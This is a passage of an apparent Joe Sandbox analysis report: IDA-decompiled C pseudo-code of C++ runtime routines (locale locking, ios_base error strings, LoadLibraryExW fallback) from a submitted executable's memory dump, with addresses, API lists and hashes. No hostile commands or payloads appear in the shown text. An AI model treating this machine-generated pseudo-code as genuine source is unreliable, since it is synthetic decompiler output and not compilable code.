                                                																				_t294 = _t294 + 4;
                                                																			}
                                                																			_v172 = 0;
                                                																			E001A6182( &_v176);
                                                																			E001A644B(__eflags, _t263);
                                                																			_t287 = _t294 + 4;
                                                																			 *((intOrPtr*)( *_t263 + 4))();
                                                																			 *0x203570 = _t263;
                                                																			goto L47;
                                                																		}
                                                																	} else {
                                                																		_t263 = _t276;
                                                																		goto L47;
                                                																	}
                                                																} else {
                                                																	_t263 =  *(_t215 +  *((intOrPtr*)(_t173 + 8)));
                                                																	goto L52;
                                                																}
                                                															}
                                                														} else {
                                                															L47:
                                                															E001A6182( &_v56);
                                                															_pop(_t252);
                                                															_pop(_t264);
                                                															_pop(_t216);
                                                															__eflags = _v48 ^ _t287;
                                                															return E001A9545(_t263, _t216, _v48 ^ _t287, _t246, _t252, _t264);
                                                														}
                                                													}
                                                												} else {
                                                													_t31 = _t199 + 0x23; // 0x23
                                                													_t261 = _t31 & 0xffffffe0;
                                                													 *(_t261 - 4) = _t199;
                                                													L32:
                                                													_t213[4] =  *(_t286 + 0x10);
                                                													_t213[5] = _t249;
                                                													_t256 = _t261 + _t275;
                                                													__eflags = _v40 - 0x10;
                                                													 *(_t286 + 0x10) = _v16 + _t261 + _t275;
                                                													_push(_t275);
                                                													if(_v40 < 0x10) {
                                                														_push(_t213);
                                                														_push(_t261);
                                                														E001AA810();
                                                														E001AA810(_t256,  *((intOrPtr*)(_t286 + 0x28)), _v16);
                                                														 *((char*)( *((intOrPtr*)(_t286 + 0x28)))) = 0;
                                                														 *_t213 = _t261;
                                                														return _t213;
                                                													} else {
                                                														_t258 =  *_t213;
                                                														_push(_t258);
                                                														_push(_t261);
                                                														E001AA810();
                                                														E001AA810(_t261 + _t275,  *((intOrPtr*)(_t286 + 0x28)), _v16);
                                                														_t194 =  *((intOrPtr*)(_t286 + 0x28));
                                                														_t286 = _t286 + 0x18;
                                                														_t241 = _v40 + 1;
                                                														 *_t194 = 0;
                                                														__eflags = _t241 - 0x1000;
                                                														if(_t241 < 0x1000) {
                                                															L36:
                                                															_push(_t241);
                                                															_push(_t258);
                                                															L79();
                                                															 *_t213 = _t261;
                                                															return _t213;
                                                														} else {
                                                															_t246 =  *(_t258 - 4);
                                                															_t241 = _t241 + 0x23;
                                                															_t249 = _t258 - _t246;
                                                															_t48 = _t249 - 4; // 0x7ffffffb
                                                															__eflags = _t48 - 0x1f;
                                                															if(_t48 > 0x1f) {
                                                																goto L40;
                                                															} else {
                                                																_t258 = _t246;
                                                																goto L36;
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										_t261 = _v16;
                                                										E001A644B(__eflags, _t261);
                                                										_t245 =  *_t261;
                                                										_t283 = _t285 + 4;
                                                										 *((intOrPtr*)( *_t261 + 4))();
                                                										 *0x20356c = _t261;
                                                										goto L16;
                                                									}
                                                								} else {
                                                									_t261 = _t211;
                                                									goto L16;
                                                								}
                                                							} else {
                                                								_t261 =  *( *((intOrPtr*)(_t203 + 8)) + _t273);
                                                								goto L11;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}




































































































                                                0x001a5170
                                                0x001a5173
                                                0x001a517a
                                                0x001a517e
                                                0x001a5189
                                                0x001a518c
                                                0x001a5190
                                                0x001a5195
                                                0x001a519b
                                                0x001a51a1
                                                0x001a51a7
                                                0x001a51ae
                                                0x001a51b3
                                                0x001a51b9
                                                0x001a51bb
                                                0x001a51c0
                                                0x001a51c1
                                                0x001a51c6
                                                0x001a51c6
                                                0x001a51cf
                                                0x001a51d4
                                                0x001a51d4
                                                0x001a51da
                                                0x001a51dd
                                                0x001a51e7
                                                0x001a51f5
                                                0x001a51f5
                                                0x00000000
                                                0x001a51e9
                                                0x001a51ec
                                                0x001a51f1
                                                0x001a5249
                                                0x001a524d
                                                0x001a5258
                                                0x001a5259
                                                0x001a525b
                                                0x001a5266
                                                0x001a51f3
                                                0x001a51f7
                                                0x001a51fb
                                                0x001a520d
                                                0x001a520f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001a51fd
                                                0x001a51fd
                                                0x001a5205
                                                0x001a5211
                                                0x001a5213
                                                0x001a5219
                                                0x001a5222
                                                0x001a5227
                                                0x001a522a
                                                0x001a522d
                                                0x001a5267
                                                0x001a526c
                                                0x001a526d
                                                0x001a526e
                                                0x001a526f
                                                0x001a5270
                                                0x001a5277
                                                0x001a527b
                                                0x001a527c
                                                0x001a527e
                                                0x001a5287
                                                0x001a528a
                                                0x001a528f
                                                0x001a5291
                                                0x001a53c0
                                                0x00000000
                                                0x001a5297
                                                0x001a5297
                                                0x001a5298
                                                0x001a529b
                                                0x001a529e
                                                0x001a52a1
                                                0x001a52a5
                                                0x001a52a8
                                                0x001a52ac
                                                0x001a52ae
                                                0x001a52d8
                                                0x001a52dc
                                                0x001a52de
                                                0x001a52e7
                                                0x001a52e9
                                                0x001a52eb
                                                0x001a52ee
                                                0x001a52ee
                                                0x001a52f1
                                                0x001a52f7
                                                0x001a5306
                                                0x001a5308
                                                0x001a5317
                                                0x001a5317
                                                0x001a530a
                                                0x001a530b
                                                0x001a5310
                                                0x001a5313
                                                0x001a5313
                                                0x00000000
                                                0x001a52f9
                                                0x001a52f9
                                                0x001a52f9
                                                0x001a52fc
                                                0x001a52fe
                                                0x001a53c5
                                                0x001a53c5
                                                0x00000000
                                                0x001a5304
                                                0x00000000
                                                0x001a5304
                                                0x001a52fe
                                                0x001a52e0
                                                0x001a52e0
                                                0x00000000
                                                0x001a52e0
                                                0x001a52b0
                                                0x001a52b0
                                                0x001a52b2
                                                0x001a52b7
                                                0x001a52b7
                                                0x001a52ba
                                                0x001a52bb
                                                0x001a52c0
                                                0x001a52c3
                                                0x001a52c5
                                                0x001a53ca
                                                0x001a53ca
                                                0x001a53cf
                                                0x001a53d0
                                                0x001a53d6
                                                0x001a53dd
                                                0x001a53e4
                                                0x001a53e5
                                                0x001a53f3
                                                0x001a53f4
                                                0x001a53f5
                                                0x001a53f8
                                                0x001a53fc
                                                0x001a5401
                                                0x001a5407
                                                0x001a540d
                                                0x001a540f
                                                0x001a5419
                                                0x001a541e
                                                0x001a5424
                                                0x001a5426
                                                0x001a542b
                                                0x001a542b
                                                0x001a542c
                                                0x001a5431
                                                0x001a5431
                                                0x001a543d
                                                0x001a5442
                                                0x001a5442
                                                0x001a5448
                                                0x001a544b
                                                0x001a5452
                                                0x001a5455
                                                0x001a5488
                                                0x001a5488
                                                0x00000000
                                                0x001a5457
                                                0x001a545a
                                                0x001a545d
                                                0x001a545f
                                                0x001a548a
                                                0x001a548a
                                                0x001a548e
                                                0x001a54a0
                                                0x001a54a0
                                                0x001a54a2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001a5490
                                                0x001a5490
                                                0x001a5495
                                                0x001a5498
                                                0x001a54a4
                                                0x001a54a4
                                                0x001a54a6
                                                0x001a54b3
                                                0x001a54b5
                                                0x001a54bc
                                                0x001a54bf
                                                0x001a54c1
                                                0x001a54cf
                                                0x001a54c3
                                                0x001a54c3
                                                0x001a54c6
                                                0x001a54c8
                                                0x001a54ca
                                                0x001a54ca
                                                0x001a54c8
                                                0x001a54da
                                                0x001a54e1
                                                0x001a54e9
                                                0x001a54ee
                                                0x001a54f6
                                                0x001a54fb
                                                0x001a5503
                                                0x001a5508
                                                0x001a550c
                                                0x001a5511
                                                0x001a5515
                                                0x001a5519
                                                0x001a551d
                                                0x001a5521
                                                0x001a5523
                                                0x001a564d
                                                0x001a5652
                                                0x001a5653
                                                0x001a5654
                                                0x001a5655
                                                0x001a5656
                                                0x001a5657
                                                0x001a5658
                                                0x001a5659
                                                0x001a565a
                                                0x001a565b
                                                0x001a565c
                                                0x001a565d
                                                0x001a565e
                                                0x001a565f
                                                0x001a5660
                                                0x001a5664
                                                0x001a5668
                                                0x001a566e
                                                0x001a5682
                                                0x001a5682
                                                0x001a5686
                                                0x001a9583
                                                0x001a9590
                                                0x001a5670
                                                0x001a5670
                                                0x001a5673
                                                0x001a567b
                                                0x001a567e
                                                0x001afe55
                                                0x001afe56
                                                0x001afe5d
                                                0x001afe65
                                                0x001afe66
                                                0x001afe67
                                                0x001afe68
                                                0x001afe69
                                                0x001afe6a
                                                0x001afe6f
                                                0x001afe72
                                                0x001afe78
                                                0x001afe7a
                                                0x001afe7c
                                                0x001afe7f
                                                0x001afe7f
                                                0x001afe81
                                                0x001afe8c
                                                0x001afea3
                                                0x001a5680
                                                0x001a5680
                                                0x00000000
                                                0x001a5680
                                                0x001a567e
                                                0x001a5529
                                                0x001a552f
                                                0x001a5538
                                                0x001a5540
                                                0x001a5546
                                                0x001a554b
                                                0x001a554e
                                                0x001a5556
                                                0x001a555a
                                                0x001a5562
                                                0x001a5565
                                                0x001a5569
                                                0x001a556d
                                                0x001a5571
                                                0x001a5576
                                                0x001a557e
                                                0x001a5586
                                                0x001a558b
                                                0x001a558f
                                                0x001a5592
                                                0x001a5594
                                                0x001a5597
                                                0x001a559c
                                                0x001a559c
                                                0x001a559f
                                                0x001a55a3
                                                0x001a55ab
                                                0x001a55ad
                                                0x001a55b0
                                                0x001a55b5
                                                0x001a55b5
                                                0x001a55b8
                                                0x001a55bc
                                                0x001a55c4
                                                0x001a55c6
                                                0x001a55c9
                                                0x001a55ce
                                                0x001a55ce
                                                0x001a55d1
                                                0x001a55d5
                                                0x001a55dd
                                                0x001a55df
                                                0x001a55e2
                                                0x001a55e7
                                                0x001a55e7
                                                0x001a55ea
                                                0x001a55ee
                                                0x001a55f6
                                                0x001a55f8
                                                0x001a55fb
                                                0x001a5600
                                                0x001a5600
                                                0x001a5603
                                                0x001a5607
                                                0x001a560f
                                                0x001a5611
                                                0x001a5614
                                                0x001a5619
                                                0x001a5619
                                                0x001a5620
                                                0x001a5628
                                                0x001a562e
                                                0x001a5635
                                                0x001a563a
                                                0x001a563d
                                                0x00000000
                                                0x001a563d
                                                0x001a54a8
                                                0x001a54a8
                                                0x00000000
                                                0x001a54a8
                                                0x001a549a
                                                0x001a549d
                                                0x00000000
                                                0x001a549d
                                                0x001a5498
                                                0x001a5461
                                                0x001a5461
                                                0x001a5468
                                                0x001a5476
                                                0x001a5477
                                                0x001a5479
                                                0x001a547a
                                                0x001a5487
                                                0x001a5487
                                                0x001a545f
                                                0x001a52cb
                                                0x001a52cb
                                                0x001a52ce
                                                0x001a52d1
                                                0x001a5319
                                                0x001a531d
                                                0x001a5324
                                                0x001a5327
                                                0x001a532c
                                                0x001a5331
                                                0x001a5335
                                                0x001a5336
                                                0x001a5393
                                                0x001a5394
                                                0x001a5395
                                                0x001a53a3
                                                0x001a53b0
                                                0x001a53b5
                                                0x001a53bd
                                                0x001a5338
                                                0x001a5338
                                                0x001a533a
                                                0x001a533b
                                                0x001a533c
                                                0x001a534d
                                                0x001a5352
                                                0x001a5356
                                                0x001a535d
                                                0x001a535e
                                                0x001a5361
                                                0x001a5367
                                                0x001a537b
                                                0x001a537b
                                                0x001a537c
                                                0x001a537d
                                                0x001a5385
                                                0x001a5390
                                                0x001a5369
                                                0x001a5369
                                                0x001a536c
                                                0x001a536f
                                                0x001a5371
                                                0x001a5374
                                                0x001a5377
                                                0x00000000
                                                0x001a5379
                                                0x001a5379
                                                0x00000000
                                                0x001a5379
                                                0x001a5377
                                                0x001a5367
                                                0x001a5336
                                                0x001a52c5
                                                0x001a52ae
                                                0x001a522f
                                                0x001a522f
                                                0x001a5234
                                                0x001a5239
                                                0x001a523b
                                                0x001a5240
                                                0x001a5243
                                                0x00000000
                                                0x001a5243
                                                0x001a5215
                                                0x001a5215
                                                0x00000000
                                                0x001a5215
                                                0x001a5207
                                                0x001a520a
                                                0x00000000
                                                0x001a520a
                                                0x001a5205
                                                0x001a51fb
                                                0x001a51f1

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A5190
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A51AE
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A51CF
                                                • std::_Facet_Register.LIBCPMT ref: 001A5234
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A524D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                • String ID:
                                                • API String ID: 459529453-0
                                                • Opcode ID: 4fdfc00cb0243ff348278a0a087a265abe3815083e58b3b00232e856139eb83c
                                                • Instruction ID: 837da2f11323c17641e7c96a9fca2951e4e5670be94a05c7ff87b45e22335f64
                                                • Opcode Fuzzy Hash: 4fdfc00cb0243ff348278a0a087a265abe3815083e58b3b00232e856139eb83c
                                                • Instruction Fuzzy Hash: DD310879904701CFC721DF14EC8562A7BB1FBA6314F45051EE8455B223D730AE05CBC2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E001A679D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				intOrPtr* _t36;
                                                				void* _t41;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t75;
                                                				intOrPtr* _t76;
                                                				void* _t78;
                                                
                                                				_t58 = __ebx;
                                                				_push(8);
                                                				E001A9A79(0x1c68ac, __ebx, __edi, __esi);
                                                				E001A612A(_t78 - 0x14, 0);
                                                				_t75 =  *0x2027f8; // 0x0
                                                				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
                                                				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
                                                				_t36 = E001A1B80( *((intOrPtr*)(_t78 + 8)), E001A1AA0(__ebx, 0x202714, __edx, __edi));
                                                				_t73 = _t36;
                                                				if(_t36 != 0) {
                                                					L5:
                                                					E001A6182(_t78 - 0x14);
                                                					return E001A9A56(_t73);
                                                				} else {
                                                					if(_t75 == 0) {
                                                						_push( *((intOrPtr*)(_t78 + 8)));
                                                						_push(_t78 - 0x10);
                                                						_t41 = E001A6CD1(__ebx, _t73, _t75, __eflags);
                                                						_pop(_t64);
                                                						__eflags = _t41 - 0xffffffff;
                                                						if(__eflags == 0) {
                                                							E001A1910();
                                                							asm("int3");
                                                							_push(8);
                                                							E001A9A79(0x1c68ea, __ebx, _t73, _t75);
                                                							_t76 = _t64;
                                                							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
                                                							 *((intOrPtr*)(_t78 - 0x10)) = 0;
                                                							__eflags =  *((intOrPtr*)(_t78 + 0x10));
                                                							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
                                                								 *_t76 = 0x1c73bc;
                                                								 *((intOrPtr*)(_t76 + 0x10)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x30)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x34)) = 0;
                                                								 *((intOrPtr*)(_t76 + 0x38)) = 0;
                                                								 *((intOrPtr*)(_t76 + 8)) = 0x1c73b0;
                                                								 *(_t78 - 4) = 0;
                                                								 *((intOrPtr*)(_t78 - 0x10)) = 1;
                                                							}
                                                							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) = 0x1c73b8;
                                                							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
                                                							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
                                                							E001A7192(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc)));
                                                							return E001A9A56(_t76);
                                                						} else {
                                                							_t73 =  *((intOrPtr*)(_t78 - 0x10));
                                                							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
                                                							 *(_t78 - 4) = 1;
                                                							E001A644B(__eflags, _t73);
                                                							 *0x1c7144();
                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
                                                							 *0x2027f8 = _t73;
                                                							goto L5;
                                                						}
                                                					} else {
                                                						_t73 = _t75;
                                                						goto L5;
                                                					}
                                                				}
                                                			}









                                                0x001a679d
                                                0x001a679d
                                                0x001a67a4
                                                0x001a67ae
                                                0x001a67b3
                                                0x001a67be
                                                0x001a67c2
                                                0x001a67ce
                                                0x001a67d3
                                                0x001a67d7
                                                0x001a681c
                                                0x001a681f
                                                0x001a682b
                                                0x001a67d9
                                                0x001a67db
                                                0x001a67e1
                                                0x001a67e7
                                                0x001a67e8
                                                0x001a67ee
                                                0x001a67ef
                                                0x001a67f2
                                                0x001a682c
                                                0x001a6831
                                                0x001a6832
                                                0x001a6839
                                                0x001a683e
                                                0x001a6840
                                                0x001a6845
                                                0x001a6848
                                                0x001a684b
                                                0x001a684d
                                                0x001a6853
                                                0x001a6856
                                                0x001a6859
                                                0x001a685c
                                                0x001a685f
                                                0x001a6866
                                                0x001a6869
                                                0x001a6869
                                                0x001a687b
                                                0x001a6887
                                                0x001a688a
                                                0x001a6893
                                                0x001a6895
                                                0x001a68a1
                                                0x001a67f4
                                                0x001a67f4
                                                0x001a67f7
                                                0x001a67fb
                                                0x001a67ff
                                                0x001a680c
                                                0x001a6814
                                                0x001a6816
                                                0x00000000
                                                0x001a6816
                                                0x001a67dd
                                                0x001a67dd
                                                0x00000000
                                                0x001a67dd
                                                0x001a67db

                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 001A67A4
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A67AE
                                                  • Part of subcall function 001A1AA0: std::_Lockit::_Lockit.LIBCPMT ref: 001A1ABC
                                                  • Part of subcall function 001A1AA0: std::_Lockit::~_Lockit.LIBCPMT ref: 001A1AD9
                                                • codecvt.LIBCPMT ref: 001A67E8
                                                • std::_Facet_Register.LIBCPMT ref: 001A67FF
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A681F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                • String ID:
                                                • API String ID: 712880209-0
                                                • Opcode ID: a24f1b6551358dfb6ef86eb242b17af557509fd848970a2712aea9f01393ff17
                                                • Instruction ID: c85a4d28e4533ec03881ef13238ae53d97b8e5cfcf0dc9243ed7d53296971771
                                                • Opcode Fuzzy Hash: a24f1b6551358dfb6ef86eb242b17af557509fd848970a2712aea9f01393ff17
                                                • Instruction Fuzzy Hash: 1301F93D900315DFCB05EB64D8566BE7B75EFA2710F284009E411672D2DF349E45C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E001A2130(void* __ecx, signed int _a4, char _a8) {
                                                				char _v24;
                                                				char _v32;
                                                				intOrPtr _v48;
                                                				signed int _t20;
                                                				void* _t23;
                                                				void* _t33;
                                                				signed char _t36;
                                                				intOrPtr* _t37;
                                                				intOrPtr* _t40;
                                                				char* _t45;
                                                				intOrPtr _t46;
                                                
                                                				_t20 = _a4 & 0x00000017;
                                                				 *(__ecx + 0xc) = _t20;
                                                				_t36 =  *(__ecx + 0x10) & _t20;
                                                				if(_t36 == 0) {
                                                					return _t20;
                                                				} else {
                                                					if(_a8 != 0) {
                                                						E001AA3E0(0, 0);
                                                					}
                                                					if((_t36 & 0x00000004) == 0) {
                                                						_t45 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
                                                					} else {
                                                						_t45 = "ios_base::badbit set";
                                                					}
                                                					_t23 = E001A14B0( &_v32, 1);
                                                					_t37 =  &_v24;
                                                					E001A2080(_t33, _t37, _t45, _t23);
                                                					E001AA3E0( &_v32, 0x1d4538);
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					asm("int3");
                                                					_push(_t45);
                                                					_t46 = _v48;
                                                					asm("xorps xmm0, xmm0");
                                                					_t40 = _t37;
                                                					 *_t40 = 0x1c71e4;
                                                					asm("movq [eax], xmm0");
                                                					_t14 = _t46 + 4; // 0x1d453c
                                                					E001AA33B(_t14, _t40 + 4);
                                                					 *_t40 = 0x1c7270;
                                                					_t15 = _t46 + 0xc; // 0x1d4564
                                                					_t16 = _t46 + 0x10; // 0x0
                                                					 *((intOrPtr*)(_t40 + 0xc)) =  *_t15;
                                                					 *((intOrPtr*)(_t40 + 0x10)) =  *_t16;
                                                					 *_t40 = 0x1c731c;
                                                					return _t40;
                                                				}
                                                			}














                                                0x001a213c
                                                0x001a213f
                                                0x001a2146
                                                0x001a2148
                                                0x001a2156
                                                0x001a214a
                                                0x001a214e
                                                0x001a215d
                                                0x001a215d
                                                0x001a2165
                                                0x001a217b
                                                0x001a2167
                                                0x001a2167
                                                0x001a2167
                                                0x001a2185
                                                0x001a218d
                                                0x001a2193
                                                0x001a21a2
                                                0x001a21a7
                                                0x001a21a8
                                                0x001a21a9
                                                0x001a21aa
                                                0x001a21ab
                                                0x001a21ac
                                                0x001a21ad
                                                0x001a21ae
                                                0x001a21af
                                                0x001a21b0
                                                0x001a21b1
                                                0x001a21b5
                                                0x001a21b9
                                                0x001a21bf
                                                0x001a21c5
                                                0x001a21c9
                                                0x001a21cd
                                                0x001a21d2
                                                0x001a21db
                                                0x001a21de
                                                0x001a21e1
                                                0x001a21e6
                                                0x001a21e9
                                                0x001a21f1
                                                0x001a21f1

                                                APIs
                                                • ___std_exception_copy.LIBVCRUNTIME ref: 001A21CD
                                                  • Part of subcall function 001AA3E0: RaiseException.KERNEL32(E06D7363,00000001,00000003,001A9F79,?,?,?,?,001A9F79,?,001D457C), ref: 001AA440
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ExceptionRaise___std_exception_copy
                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                • API String ID: 3109751735-1866435925
                                                • Opcode ID: 8ac06e1934c945e73e834c7bbd0f37cde521db6fe7b8774436b04475fcee84ca
                                                • Instruction ID: 95f9f8c2d1db907a140426d07bf2e336927451a25390cbb7af4f350732b5349c
                                                • Opcode Fuzzy Hash: 8ac06e1934c945e73e834c7bbd0f37cde521db6fe7b8774436b04475fcee84ca
                                                • Instruction Fuzzy Hash: 3D112CB69047046BC710DF5CD841F96B3E8BF66310F04852AFA54A7381F770E904CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001ADAC2(WCHAR* _a4) {
                                                				struct HINSTANCE__* _t4;
                                                
                                                				_t4 = LoadLibraryExW(_a4, 0, 0x800);
                                                				if(_t4 != 0) {
                                                					return _t4;
                                                				} else {
                                                					if(GetLastError() != 0x57 || E001B6358(_a4, L"api-ms-", 7) == 0) {
                                                						return 0;
                                                					}
                                                					return LoadLibraryExW(_a4, 0, 0);
                                                				}
                                                			}




                                                0x001adacf
                                                0x001adad7
                                                0x001adb0c
                                                0x001adad9
                                                0x001adae2
                                                0x00000000
                                                0x001adb09
                                                0x001adb08
                                                0x001adb08

                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,001ADA73,00000000,?,00202E0C,?,?,?,001ADC16,00000004,InitializeCriticalSectionEx,001C8CE8,InitializeCriticalSectionEx), ref: 001ADACF
                                                • GetLastError.KERNEL32(?,001ADA73,00000000,?,00202E0C,?,?,?,001ADC16,00000004,InitializeCriticalSectionEx,001C8CE8,InitializeCriticalSectionEx,00000000,?,001AD9CD), ref: 001ADAD9
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 001ADB01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: a6458388438e2b15b4b3b8d43cda4c37ba5865a92eb9be73482f673a9bbf6135
                                                • Instruction ID: 7b1badf317a38a658d94af48a51adb6a297bd1069fdee3e5a4917899117e1f7c
                                                • Opcode Fuzzy Hash: a6458388438e2b15b4b3b8d43cda4c37ba5865a92eb9be73482f673a9bbf6135
                                                • Instruction Fuzzy Hash: 5DE04834284204BBDF102B60EC06F593F54AF13B60F150020F90DE88E1E7A1DC60CA94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 76%
                                                			E001BA14A(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                				char _v16;
                                                				signed int _v20;
                                                				char _v28;
                                                				signed int _v35;
                                                				signed char _v36;
                                                				void _v44;
                                                				long _v48;
                                                				signed char* _v52;
                                                				char _v53;
                                                				long _v60;
                                                				intOrPtr _v64;
                                                				struct _OVERLAPPED* _v68;
                                                				signed int _v72;
                                                				struct _OVERLAPPED* _v76;
                                                				signed int _v80;
                                                				signed int _v84;
                                                				intOrPtr _v88;
                                                				void _v92;
                                                				long _v96;
                                                				signed char* _v100;
                                                				void* _v104;
                                                				intOrPtr _v108;
                                                				char _v112;
                                                				int _v116;
                                                				struct _OVERLAPPED* _v120;
                                                				struct _OVERLAPPED* _v124;
                                                				struct _OVERLAPPED* _v128;
                                                				struct _OVERLAPPED* _v132;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t177;
                                                				signed int _t178;
                                                				signed int _t180;
                                                				signed char* _t190;
                                                				void* _t200;
                                                				signed char* _t201;
                                                				long _t205;
                                                				intOrPtr _t210;
                                                				void _t212;
                                                				signed char* _t217;
                                                				void* _t224;
                                                				signed int _t227;
                                                				struct _OVERLAPPED* _t229;
                                                				void* _t238;
                                                				signed char* _t240;
                                                				signed char* _t243;
                                                				long _t246;
                                                				intOrPtr _t247;
                                                				signed char* _t248;
                                                				void* _t258;
                                                				intOrPtr _t265;
                                                				void* _t266;
                                                				struct _OVERLAPPED* _t267;
                                                				signed int _t268;
                                                				intOrPtr* _t279;
                                                				signed int _t281;
                                                				signed int _t285;
                                                				signed char _t286;
                                                				long _t287;
                                                				signed int _t291;
                                                				signed char* _t292;
                                                				struct _OVERLAPPED* _t296;
                                                				void* _t299;
                                                				signed int _t300;
                                                				void* _t302;
                                                				struct _OVERLAPPED* _t303;
                                                				signed char* _t306;
                                                				intOrPtr* _t307;
                                                				void* _t308;
                                                				signed int _t309;
                                                				long _t310;
                                                				signed int _t311;
                                                				signed int _t312;
                                                				signed int _t313;
                                                				void* _t314;
                                                				void* _t315;
                                                				void* _t316;
                                                
                                                				_push(0xffffffff);
                                                				_push(0x1c6b48);
                                                				_push( *[fs:0x0]);
                                                				_t315 = _t314 - 0x74;
                                                				_t177 =  *0x1d5010; // 0x8121a627
                                                				_t178 = _t177 ^ _t313;
                                                				_v20 = _t178;
                                                				_push(_t178);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t180 = _a8;
                                                				_t306 = _a12;
                                                				_t265 = _a20;
                                                				_t268 = (_t180 & 0x0000003f) * 0x38;
                                                				_t291 = _t180 >> 6;
                                                				_v100 = _t306;
                                                				_v64 = _t265;
                                                				_v84 = _t291;
                                                				_v72 = _t268;
